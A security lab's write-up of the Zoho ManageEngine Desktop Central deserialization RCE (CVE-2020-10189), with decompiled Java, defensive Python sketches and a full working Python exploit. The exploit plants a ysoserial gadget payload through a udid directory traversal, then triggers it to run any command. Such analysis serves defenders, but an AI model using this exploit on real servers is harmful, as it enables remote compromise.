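Introduction

Recently, FireEye, one of the world's leading cybersecurity companies, was reportedly attacked by an APT group. Information about many of its government customers was accessed without authorization, and its red team tools were stolen. It is not yet clear how the stolen tools will be used, but FireEye has published a set of countermeasures on GitHub. Here, QiAnXin Code Security Lab analyzes and reproduces, from a technical perspective, one of the vulnerabilities referenced in that GitHub repository, in the hope of giving readers some insight and helping them put defenses in place.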

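Vulnerability Overview

Zoho ManageEngine Desktop Central is an endpoint management solution from Zoho that runs on Windows. It manages devices across a network, such as mobile phones, Linux servers and Windows workstations, and can push updates and control access permissions.

Earlier in 2020, security researcher steventseeley found a deserialization RCE vulnerability in this product (CVE-2020-10189). The exploit rests on the udid and filename parameters of a file-upload endpoint, which together control where the uploaded file is written and what it is named. An attacker uploads a file containing a malicious serialized Java object to a location that another endpoint later reads and deserializes. The malicious code runs at that point.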

Affected Product

Zoho ManageEngine Desktop Central

Affected Versions

version < 10.0.473

Fixed Versions

version >= 10.0.479

Test Environment

- Windows 7 (server running Zoho ManageEngine Desktop Central 10.0.465 x64)
- Windows 10 (attacker machine)
- Python 3 (the POC below uses Python 3-only calls such as bytes.fromhex)

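Vulnerability Analysis

Exploitation needs two pieces:

- a place where the product deserializes data read from a file;
- a way to write a file containing a malicious serialized object to the location that this deserialization point reads.

Deserializing that file then triggers code execution.

First, the deserialization point. The CewolfServlet component contains deserialization logic. In the web application directory DesktopCentral_Server/webapps/DesktopCentral/WEB-INF/, open web.xml and look at the servlet named CewolfServlet: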

```xml
<servlet>
    <servlet-name>CewolfServlet</servlet-name>
    <servlet-class>de.laures.cewolf.CewolfRenderer</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>overliburl</param-name>
        <param-value>/js/overlib.js</param-value>
    </init-param>
    <init-param>
        <param-name>storage</param-name>
        <param-value>de.laures.cewolf.storage.FileStorage</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

This servlet is implemented by de.laures.cewolf.CewolfRenderer, which lives in DesktopCentral_Server/lib/cewolf-1.2.4.jar. Its storage init parameter is set to de.laures.cewolf.storage.FileStorage. The doGet method of de.laures.cewolf.CewolfRenderer is shown below.

```java
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    if (debugged) {
        this.logRequest(request);
    }
    this.addHeaders(response);
    if (request.getParameter("state") == null && request.getParameterNames().hasMoreElements()) {
        int width = 400;
        int height = 400;
        boolean removeAfterRendering = false;
        if (request.getParameter("removeAfterRendering") != null) {
            removeAfterRendering = true;
        }
        if (request.getParameter("width") != null) {
            width = Integer.parseInt(request.getParameter("width"));
        }
        if (request.getParameter("height") != null) {
            height = Integer.parseInt(request.getParameter("height"));
        }
        if (!renderingEnabled) {
            this.renderNotEnabled(response, 400, 50);
        } else if (width <= this.config.getMaxImageWidth() && height <= this.config.getMaxImageHeight()) {
            // Attacker-controlled input parameter
            String imgKey = request.getParameter("img");
            if (imgKey == null) {
                this.logAndRenderException(new ServletException("no 'img' parameter provided for Cewolf servlet."), response, width, height);
            } else {
                Storage storage = this.config.getStorage();
                // imgKey is passed straight to getChartImage
                ChartImage chartImage = storage.getChartImage(imgKey, request);
                if (chartImage == null) {
                    this.renderImageExpiry(response, 400, 50);
                } else {
                    requestCount.incrementAndGet();
                    try {
                        long start = System.currentTimeMillis();
                        int size = chartImage.getSize();
                        response.setContentType(chartImage.getMimeType());
                        response.setContentLength(size);
                        response.setBufferSize(size);
                        response.setStatus(200);
                        response.getOutputStream().write(chartImage.getBytes());
                        long last = System.currentTimeMillis() - start;
                        if (debugged) {
                            this.log("creation time for chart " + imgKey + ": " + last + "ms.");
                        }
                    } catch (Throwable var22) {
                        this.logAndRenderException(var22, response, width, height);
                    } finally {
                        if (removeAfterRendering) {
                            try {
                                storage.removeChartImage(imgKey, request);
                            } catch (CewolfException var21) {
                                this.log("Removal of image failed", var21);
                            }
                        }
                    }
                }
            }
        } else {
            this.renderImageTooLarge(response, 400, 50);
        }
    } else {
        this.requestState(response);
    }
}
```
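The branch logic above can be modeled in a few lines to see which requests reach storage.getChartImage. This is a hypothetical Python sketch, not product code. MAX_WIDTH and MAX_HEIGHT stand in for config.getMaxImageWidth() and config.getMaxImageHeight(), whose real values the article does not give, and rendering is assumed to be enabled.

```python
# Hypothetical model of CewolfRenderer.doGet's branching (not product code).
# MAX_WIDTH / MAX_HEIGHT are assumed stand-ins for config.getMaxImageWidth()
# and config.getMaxImageHeight(); their real values are not given in the article.
MAX_WIDTH = 1000
MAX_HEIGHT = 1000


def reaches_get_chart_image(params, rendering_enabled=True):
    """Return True if a GET with these query parameters would call storage.getChartImage."""
    # doGet only renders when 'state' is absent and at least one parameter is present.
    if "state" in params or not params:
        return False
    if not rendering_enabled:
        return False
    # Defaults of 400 mirror the Java code.
    width = int(params.get("width", 400))
    height = int(params.get("height", 400))
    if width > MAX_WIDTH or height > MAX_HEIGHT:
        return False
    # The attacker-controlled 'img' value is what reaches getChartImage.
    return "img" in params


print(reaches_get_chart_image({"img": "\\logger.zip"}))
print(reaches_get_chart_image({"img": "\\logger.zip", "state": "x"}))
```

Under these assumptions, a request that carries only img, as the POC's second stage does, takes the branch that opens and deserializes the file.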

The img parameter is attacker-controlled. It is passed to getChartImage of the configured storage class, de.laures.cewolf.storage.FileStorage:

```java
public ChartImage getChartImage(String id, HttpServletRequest request) {
    ChartImage res = null;
    ObjectInputStream ois = null;
    try {
        // Open the file selected by the "img" parameter
        ois = new ObjectInputStream(new FileInputStream(this.getFileName(id)));
        // Deserialization sink
        res = (ChartImage)ois.readObject();
        ois.close();
    } catch (Exception var15) {
        var15.printStackTrace();
    } finally {
        if (ois != null) {
            try {
                ois.close();
            } catch (IOException var14) {
                var14.printStackTrace();
            }
        }
    }
    return res;
}

private String getFileName(String id) {
    // Builds the storage path by plain string concatenation
    return this.basePath + "_chart" + id;
}
```

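getChartImage deserializes the file contents with readObject(). The file path comes from getFileName, which joins three parts without any validation: the storage base path, the string "_chart", and the id (the img value).

In short, the file to be deserialized must be stored at basePath + "_chart" + img. Assume basePath ends with a path separator, as the exploit paths later imply. Then setting img to \logger.zip selects a file named logger.zip inside a directory named _chart under the base path.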
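The path mapping can be checked with a one-line mirror of getFileName. This is a sketch, and the install location is hypothetical: it assumes basePath is the DesktopCentral web application root and ends with a backslash.

```python
def cewolf_file_name(base_path, img_id):
    """Mirror of FileStorage.getFileName: plain concatenation, no validation."""
    return base_path + "_chart" + img_id


# Hypothetical install location; assumes basePath is the DesktopCentral
# web-app root and ends with a path separator.
BASE_PATH = "C:\\DesktopCentral_Server\\webapps\\DesktopCentral\\"

print(cewolf_file_name(BASE_PATH, "\\logger.zip"))
# C:\DesktopCentral_Server\webapps\DesktopCentral\_chart\logger.zip
```

Because the id is appended verbatim, whatever is written to ...\DesktopCentral\_chart\logger.zip is what a request with img=\logger.zip deserializes.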

Next, the write point. web.xml also declares a servlet that handles uploads:

```xml
<servlet>
    <!-- an upload endpoint -->
    <servlet-name>MDMLogUploaderServlet</servlet-name>
    <servlet-class>com.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet</servlet-class>
</servlet>
```

The key parts of com.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet are shown below.

```java
public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest) throws ServletException, IOException {
    Reader reader = null;
    PrintWriter printWriter = null;
    this.logger.log(Level.WARNING, "Received Log from agent");
    Long nDataLength = (long)request.getContentLength();
    this.logger.log(Level.WARNING, "MDMLogUploaderServlet : file conentent lenght is {0}", nDataLength);
    this.logger.log(Level.WARNING, "MDMLogUploaderServlet :Acceptable file conentent lenght is {0}", this.acceptedLogSize);
    try {
        if (nDataLength <= this.acceptedLogSize) {
            String initiatedBy = request.getParameter("initiatedBy");
            // Attacker-controlled parameter
            String udid = request.getParameter("udid");
            String platform = request.getParameter("platform");
            // Attacker-controlled parameter
            String fileName = request.getParameter("filename");
            HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);
            if (deviceMap != null) {
                this.customerID = (Long)deviceMap.get("CUSTOMER_ID");
                this.deviceName = (String)deviceMap.get("MANAGEDDEVICEEXTN.NAME");
                this.domainName = (String)deviceMap.get("DOMAIN_NETBIOS_NAME");
                this.resourceID = (Long)deviceMap.get("RESOURCE_ID");
                this.platformType = (Integer)deviceMap.get("PLATFORM_TYPE");
            } else {
                // Unknown udid: fall back to default values
                this.customerID = 0L;
                this.deviceName = "default";
                this.domainName = "default";
            }
            if (initiatedBy != null && initiatedBy.equals(this.fromUser)) {
                JSONObject jsonObject = new JSONObject(request.getParameter("extraData"));
                String issueType = jsonObject.getString("IssueType");
                String issueDescription = jsonObject.getString("IssueDescription");
                String fromAddress = jsonObject.getString("EmailId");
                String outputFileName = MDMApiFactoryProvider.getMdmCompressAPI().getSupportFileName() + ".zip";
                String toAddress = ProductUrlLoader.getInstance().getValue("supportmailid");
                String ticketID = jsonObject.getString("TicketId");
                ticketID = ticketID.trim().equals("") ? "NA" : ticketID.trim();
                Boolean status = this.downloadUserSupportFile(fileName, udid, request, response);
                if (status) {
                    status = this.zipProcess(fileName, outputFileName, udid, request, response);
                }
                if (status) {
                    this.doUpload(outputFileName, fromAddress, toAddress, issueType, issueDescription, ticketID);
                }
                File resourceDir = new File(ApiFactoryProvider.getUtilAccessAPI().getServerHome() + File.separator + "logsFromUser" + File.separator + this.resourceID);
                if (resourceDir.exists()) {
                    FileUtils.deleteDirectory(resourceDir);
                }
                if (!status) {
                    this.logger.log(Level.WARNING, "MDMLogUploaderServlet : Going to reject the file upload due to failure to download/zipping/upload issue");
                    response.sendError(403, "Request Refused");
                }
                return;
            }
            // Both branches pass the controlled fileName and udid on
            if (CustomerInfoUtil.getInstance().isSAS()) {
                this.downloadSupportFileCloud(fileName, udid, request, response);
            } else {
                this.downloadSupportFile(fileName, udid, request, response);
            }
            SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();
            supportFileCreation.incrementMDMLogUploadCount();
            JSONObject deviceDetails = new JSONObject();
            deviceDetails.put("platform_type_id", this.platformType);
            deviceDetails.put("device_id", this.resourceID);
            deviceDetails.put("device_name", this.deviceName);
            supportFileCreation.removeDeviceFromList(deviceDetails);
            if (CustomerInfoUtil.getInstance().isSAS()) {
                GroupEventNotifier.getInstance().actionCompleted(Long.parseLong(String.valueOf(this.resourceID)), "MDM_AGENT_LOG_UPLOAD");
            }
            return;
        }
        this.logger.log(Level.WARNING, "MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}", nDataLength);
        response.sendError(403, "Request Refused");
    } catch (Exception var30) {
        this.logger.log(Level.WARNING, "Exception ", var30);
        return;
    } finally {
        if (reader != null) {
            try {
                ((Reader)reader).close();
            } catch (Exception var29) {
                var29.fillInStackTrace();
            }
        }
    }
}

public void downloadSupportFile(String fileName, String udid, HttpServletRequest request, HttpServletResponse response) throws Exception {
    String baseDir = System.getProperty("server.home");
    this.deviceName = this.removeInvalidCharactersInFileName(this.deviceName);
    // udid is concatenated directly into the storage directory path
    String localDirToStore = baseDir + File.separator + "mdm-logs" + File.separator + this.customerID + File.separator + this.deviceName + "_" + udid;
    File file = new File(localDirToStore);
    if (!file.exists()) {
        file.mkdirs();
    }
    this.logger.log(Level.WARNING, "absolute Dir {0} ", new Object[]{localDirToStore});
    fileName = fileName.toLowerCase();
    // Only filename is validated; allowed extensions are log|txt|zip|7z
    if (fileName != null && FileUploadUtil.hasVulnerabilityInFileName(fileName, "log|txt|zip|7z")) {
        this.logger.log(Level.WARNING, "MDMLogUploaderServlet : Going to reject the file upload {0}", fileName);
        response.sendError(403, "Request Refused");
    } else {
        String absoluteFileName = localDirToStore + File.separator + fileName;
        this.logger.log(Level.WARNING, "absolute File Name {0} ", new Object[]{fileName});
        InputStream in = null;
        FileOutputStream fout = null;
        try {
            // The raw request body is written to the file unchanged
            in = request.getInputStream();
            fout = new FileOutputStream(absoluteFileName);
            byte[] bytes = new byte[10000];
            int i;
            while((i = in.read(bytes)) != -1) {
                fout.write(bytes, 0, i);
            }
            fout.flush();
        } catch (Exception var16) {
            var16.printStackTrace();
        } finally {
            if (fout != null) {
                fout.close();
            }
            if (in != null) {
                in.close();
            }
        }
    }
}

public void downloadSupportFileCloud(String fileName, String udid, HttpServletRequest request, HttpServletResponse response) throws Exception {
    String cloudBaseDir = "support";
    // udid is concatenated directly into the storage directory path
    String dfsDirToStore = cloudBaseDir + File.separator + "mdm-logs" + File.separator + this.customerID + File.separator + this.deviceName + "_" + udid;
    this.logger.log(Level.WARNING, "absolute Dir {0} ", new Object[]{dfsDirToStore});
    fileName = fileName.toLowerCase();
    if (fileName != null && FileUploadUtil.hasVulnerabilityInFileName(fileName, "log|txt|zip|7z")) {
        this.logger.log(Level.WARNING, "AgentLogUploadServlet : Going to reject the file upload {0}", fileName);
        response.sendError(403, "Request Refused");
    } else {
        String absoluteFileName = dfsDirToStore + File.separator + fileName;
        this.logger.log(Level.WARNING, "absolute File Name {0} ", new Object[]{fileName});
        InputStream in = null;
        OutputStream fout = ApiFactoryProvider.getFileAccessAPI().writeFile(absoluteFileName);
        try {
            in = request.getInputStream();
            byte[] bytes = new byte[10000];
            int i;
            while((i = in.read(bytes)) != -1) {
                fout.write(bytes, 0, i);
            }
            fout.flush();
        } catch (Exception var15) {
            this.logger.log(Level.SEVERE, "Error : " + var15);
        } finally {
            if (in != null) {
                in.close();
            }
            if (fout != null) {
                fout.close();
            }
        }
    }
}
```

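The comments show that the attacker-controlled udid and filename parameters are both used to build the path of the uploaded file. The servlet code applies no checks to udid at all. filename is checked by FileUploadUtil.hasVulnerabilityInFileName, whose core code is: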

```java
public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {
    return isContainDirectoryTraversal(fileName) || isCompletePath(fileName) || !isValidFileExtension(fileName, allowedFileExt);
}

// Does the name end with an allowed extension?
public static boolean isValidFileExtension(String fileName, String fileExtPattern) {
    if (fileName.indexOf("\u0000") != -1) {
        fileName = fileName.substring(0, fileName.indexOf("\u0000"));
    }
    fileExtPattern = fileExtPattern.replaceAll("\\s+", "").toLowerCase();
    String regexFileExtensionPattern = "([^\\s]+(\\.(?i)(" + fileExtPattern + "))$)";
    Pattern pattern = Pattern.compile(regexFileExtensionPattern);
    Matcher matcher = pattern.matcher(fileName.toLowerCase());
    return matcher.matches();
}

// Does the name contain a path separator (directory traversal)?
private static boolean isContainDirectoryTraversal(String fileName) {
    return fileName.contains("/") || fileName.contains("\\");
}

// Is the name an absolute path (drive letter)?
private static boolean isCompletePath(String fileName) {
    String regexFileExtensionPattern = "([a-zA-Z]:[\\ \\\\ / //].*)";
    Pattern pattern = Pattern.compile(regexFileExtensionPattern);
    Matcher matcher = pattern.matcher(fileName);
    return matcher.matches();
}
```
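Porting the three checks to Python shows why filename cannot carry the traversal while udid can. This is an illustrative re-implementation, not Zoho's code. Java regex semantics are approximated with Python's re: Matcher.matches() becomes re.fullmatch, and the drive-letter class is rewritten in a simpler but roughly equivalent form.

```python
import re


def is_valid_file_extension(file_name, ext_pattern):
    # Like the Java code, ignore everything from the first NUL character on.
    if "\x00" in file_name:
        file_name = file_name[: file_name.index("\x00")]
    ext_pattern = re.sub(r"\s+", "", ext_pattern).lower()
    # Java's Matcher.matches() must match the whole string, hence re.fullmatch.
    # The (?i) flag is dropped because both sides are already lower-cased.
    regex = r"([^\s]+(\.(" + ext_pattern + r"))$)"
    return re.fullmatch(regex, file_name.lower()) is not None


def is_contain_directory_traversal(file_name):
    # Only path separators are checked.
    return "/" in file_name or "\\" in file_name


def is_complete_path(file_name):
    # Roughly the Java class [\ \\ / //]: a drive letter, ':' then space, '\' or '/'.
    return re.fullmatch(r"[a-zA-Z]:[ \\/].*", file_name) is not None


def has_vulnerability_in_file_name(file_name, allowed_ext):
    return (is_contain_directory_traversal(file_name)
            or is_complete_path(file_name)
            or not is_valid_file_extension(file_name, allowed_ext))


for name in ["logger.zip", "..\\evil.zip", "logger.jsp"]:
    verdict = "rejected" if has_vulnerability_in_file_name(name, "log|txt|zip|7z") else "accepted"
    print(name, verdict)
```

logger.zip is accepted, while any name containing a separator or a disallowed extension is rejected. The traversal therefore has to live in a parameter these checks never see.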

On top of these checks, the URL security configuration for /mdm/mdmLogUploader restricts the request parameters:

```xml
<url path="/mdm/mdmLogUploader" apiscope="MDMCloudEnrollment" authentication="required" duration="60" threshold="10" lock-period="60" method="post" csrf="false">
    <param name="platform" regex="ios|android"/>
    <!-- filename may only be logger.txt, logger.zip, mdmlogs.zip or managedprofile_mdmlogs.zip -->
    <param name="filename" regex="logger.txt|logger.zip|mdmlogs.zip|managedprofile_mdmlogs.zip"/>
    <param name="uuid" regex="safestring"/>
    <param name="udid" regex="udid"/>
    <param name="erid" type="long"/>
    <param name="authtoken" regex="apikey" secret="true"/>
    <param name="SCOPE" regex="scope" />
    <param name="encapiKey" regex="encapiKey" max-len="200" />
    <param name="initiatedBy" regex="safestring"/>
    <param name="extraData" type="JSONObject" template="supportIssueDetailsJson" max-len="2500"/>
</url>
```

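filename is therefore subject to extension and path-separator checks. The URL configuration further restricts it to one of logger.txt, logger.zip, mdmlogs.zip or managedprofile_mdmlogs.zip. The directory traversal therefore has to go into udid.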

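Putting this together, upload the serialized file with udid set to aaa\..\..\..\webapps\DesktopCentral\_chart and filename set to logger.zip. This satisfies every check above. The POC below uses si in place of aaa. The prefix only forms part of a directory name that the first ..\ steps back out of.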
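The path that downloadSupportFile actually writes to can be checked with a sketch that mirrors its string concatenation and then normalizes the result with Windows rules (ntpath). The following are assumptions, not values from the article:

- server.home is taken to be C:\DesktopCentral_Server (hypothetical);
- getDeviceDetailsFromUDID is assumed to return null for this udid, so the code's fallback values customerID = 0 and deviceName = "default" apply;
- removeInvalidCharactersInFileName is assumed to leave "default" unchanged.

```python
import ntpath


def upload_path(base_dir, customer_id, device_name, udid, file_name):
    """Mirror of the string concatenation in downloadSupportFile (Windows separators)."""
    sep = "\\"
    local_dir = (base_dir + sep + "mdm-logs" + sep + str(customer_id)
                 + sep + device_name + "_" + udid)
    return local_dir + sep + file_name


# Hypothetical server.home; for an unknown udid the servlet falls back to
# customerID = 0 and deviceName = "default".
SERVER_HOME = "C:\\DesktopCentral_Server"
UDID = "aaa\\..\\..\\..\\webapps\\DesktopCentral\\_chart"

raw = upload_path(SERVER_HOME, 0, "default", UDID, "logger.zip")
print(raw)
print(ntpath.normpath(raw))
```

The three ..\ components undo default_aaa, 0 and mdm-logs, so the upload lands in webapps\DesktopCentral\_chart\logger.zip. That is the file getFileName resolves for img=\logger.zip if basePath is the DesktopCentral web root.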

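The server ships commons-collections.jar (3.1) and commons-beanutils-1.8.0.jar, so a deserialization gadget chain built on these libraries can be used. The payload in the POC below is a ysoserial CommonsBeanutils1-style chain. The class names embedded in its hex include:

- java.util.PriorityQueue
- org.apache.commons.beanutils.BeanComparator
- org.apache.commons.collections.comparators.ComparableComparator
- com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl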
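The uploaded "logger.zip" is not a ZIP archive at all. The payload begins with the Java serialization stream header (aced0005). A defender could flag such uploads by inspecting that header. The sketch below is a hypothetical helper, not part of the original analysis. It reads the header and the class name of the top-level object, following the Java Object Serialization Stream Protocol:

- STREAM_MAGIC 0xACED and STREAM_VERSION 5;
- TC_OBJECT 0x73 followed by TC_CLASSDESC 0x72;
- a class name written as a 2-byte length plus modified UTF-8.

```python
import struct

STREAM_MAGIC = 0xACED
STREAM_VERSION = 5
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72


def first_class_name(data: bytes):
    """Return the class name of the top-level object in a Java serialization stream, or None."""
    if len(data) < 8:
        return None
    magic, version = struct.unpack(">HH", data[:4])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        return None
    if data[4] != TC_OBJECT or data[5] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", data[6:8])
    name = data[8:8 + name_len]
    if len(name) != name_len:
        return None
    # Class names are modified UTF-8; plain UTF-8 decoding suffices for ASCII names.
    return name.decode("utf-8", errors="replace")


# First 32 bytes of the POC payload's hex.
header = bytes.fromhex("aced0005737200176a6176612e7574696c2e5072696f72697479517565756594")
print(first_class_name(header))  # java.util.PriorityQueue
```

A genuine ZIP starts with PK\x03\x04 and returns None here.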

Exploitation

The POC, with annotations, is as follows:

```python
#!/usr/bin/env python3
import os
import sys
import struct
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def _get_payload(c):
    p = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594"
    p += "da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400"
    p += "164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200"
    p += "2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265"
    p += "616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172"
    p += "61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e"
    p += "672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e"
    p += "732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172"
    p += "61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75"
    p += "7470757450726f706572746965737704000000037372003a636f6d2e73756e2e"
    p += "6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e"
    p += "747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d"
    p += "5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00"
    p += "0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a"
    p += "6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f"
    p += "6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072"
    p += "6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767"
    p += "db37020000787000000002757200025b42acf317f8060854e002000078700000"
    p += "069bcafebabe0000003200390a00030022070037070025070026010010736572"
    p += "69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75"
    p += "6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465"
    p += "01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162"
    p += "6c655461626c6501000474686973010013537475625472616e736c6574506179"
    p += "6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c"
    p += "2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73"
    p += "6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f"
    p += "73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873"
    p += "6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c"
    p += "2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469"
    p += "6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73"
    p += "756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c"
    p += "74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f"
    p += "72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65"
    p += "722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074"
    p += "696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78"
    p += "616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e"
    p += "2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d"
    p += "417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865"
    p += "2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69"
    p += "7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63"
    p += "6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64"
    p += "746d2f44544d417869734974657261746f723b01000768616e646c6572010041"
    p += "4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c"
    p += "2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572"
    p += "3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a"
    p += "000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f"
    p += "4761646765747324537475625472616e736c65745061796c6f6164010040636f"
    p += "6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f"
    p += "78736c74632f72756e74696d652f41627374726163745472616e736c65740100"
    p += "146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f"
    p += "6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f"
    p += "5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061"
    p += "796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100"
    p += "116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469"
    p += "6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a"
    p += "002b002e01000708003001000465786563010027284c6a6176612f6c616e672f"
    p += "537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033"
    p += "0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961"
    p += "6c2f50776e6572373633323838353835323036303901001f4c79736f73657269"
    p += "616c2f50776e657237363332383835383532303630393b002100020003000100"
    p += "040001001a000500060001000700000002000800040001000a000b0001000c00"
    p += "00002f00010001000000052ab70001b100000002000d0000000600010000002e"
    p += "000e0000000c000100000005000f003800000001001300140002000c0000003f"
    p += "0000000300000001b100000002000d00000006000100000033000e0000002000"
    p += "0300000001000f00380000000000010015001600010000000100170018000200"
    p += "19000000040001001a00010013001b0002000c000000490000000400000001b1"
    p += "00000002000d00000006000100000037000e0000002a000400000001000f0038"
    p += "00000000000100150016000100000001001c001d000200000001001e001f0003"
    p += "0019000000040001001a00080029000b0001000c00000024000300020000000f"
    p += "a70003014cb8002f1231b6003557b10000000100360000000300010300020020"
    p += "00000002002100110000000a000100020023001000097571007e0010000001d4"
    p += "cafebabe00000032001b0a000300150700170700180700190100107365726961"
    p += "6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505"
    p += "71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100"
    p += "0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65"
    p += "5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365"
    p += "730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164"
    p += "6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473"
    p += "2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61"
    p += "64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f"
    p += "4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f"
    p += "79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300"
    p += "2100020003000100040001001a00050006000100070000000200080001000100"
    p += "0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000"
    p += "000600010000003b000e0000000c000100000005000f00120000000200130000"
    p += "0002001400110000000a000100020016001000097074000450776e7270770100"
    p += "7871007e000d78"
    obj = bytearray(bytes.fromhex(p))
    # adjust the embedded length fields to account for the inserted command
    obj[0x240:0x242] = struct.pack(">H", len(c) + 0x694)
    obj[0x6e5:0x6e7] = struct.pack(">H", len(c))
    # splice the command string in at its placeholder offset
    start = obj[:0x6e7]
    end = obj[0x6e7:]
    return start + str.encode(c) + end


def we_can_plant_serialized(t, c):
    # stage 1 - traversal file write primitive
    uri = "https://%s:8383/mdm/client/v1/mdmLogUploader" % t
    p = {
        "udid": "si\\..\\..\\..\\webapps\\DesktopCentral\\_chart",  # directory traversal via udid
        "filename": "logger.zip"  # passes the filename checks
    }
    h = {"Content-Type": "application/octet-stream"}  # raw binary request body
    # serialized payload that runs the command
    d = _get_payload(c)
    r = requests.post(uri, params=p, data=d, headers=h, verify=False)
    if r.status_code == 200:
        return True
    return False


def we_can_execute_cmd(t):
    # stage 2 - deserialization
    uri = "https://%s:8383/cewolf/" % t
    p = {"img": "\\logger.zip"}
    r = requests.get(uri, params=p, verify=False)
    if r.status_code == 200:
        return True
    return False


def main():
    if len(sys.argv) != 3:
        print("(+) usage: %s <target> <cmd>" % sys.argv[0])
        print("(+) eg: %s 172.16.175.153 mspaint.exe" % sys.argv[0])
        sys.exit(1)
    t = sys.argv[1]
    c = sys.argv[2]
    if we_can_plant_serialized(t, c):
        print("(+) planted our serialized payload")
        if we_can_execute_cmd(t):
            print("(+) executed: %s" % c)


if __name__ == "__main__":
    main()
```

执行脚本命令 python 服务端ip calc,在服务端命令行输入





tasklist | findestr “calc”出现如下结果,说明漏洞利用成功。

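Summary

This article analyzed the Zoho ManageEngine Desktop Central deserialization RCE (CVE-2020-10189). In the author's view, the root cause is incomplete validation of user-supplied parameters. filename is checked, but udid flows into the file path unchecked, and the img value that selects the file to deserialize is not validated either. When hunting for bugs like this, trace how each input parameter reaches file and deserialization sinks. Mature deserialization testing tools such as ysoserial can help.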
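One way to close the udid hole is to resolve the final path and refuse anything that leaves the intended base directory. This is a hypothetical sketch, not a description of Zoho's actual fix in 10.0.479. It uses Python's ntpath so that Windows path rules apply on any host. resolve_under and the mdm-logs location are illustrative names.

```python
import ntpath


def resolve_under(base_dir, *parts):
    """Join parts onto base_dir (Windows rules) and reject results outside base_dir."""
    base = ntpath.normpath(base_dir)
    target = ntpath.normpath(ntpath.join(base, *parts))
    try:
        # Compare case-insensitively, component by component.
        common = ntpath.commonpath([ntpath.normcase(base), ntpath.normcase(target)])
    except ValueError:  # e.g. the paths are on different drives
        common = None
    if common != ntpath.normcase(base):
        raise ValueError("path escapes %r: %r" % (base, target))
    return target


MDM_LOGS = "C:\\DesktopCentral_Server\\mdm-logs"  # hypothetical location
print(resolve_under(MDM_LOGS, "0", "default_aaa", "logger.zip"))
try:
    resolve_under(MDM_LOGS, "0", "default_aaa\\..\\..\\..\\webapps\\DesktopCentral\\_chart", "logger.zip")
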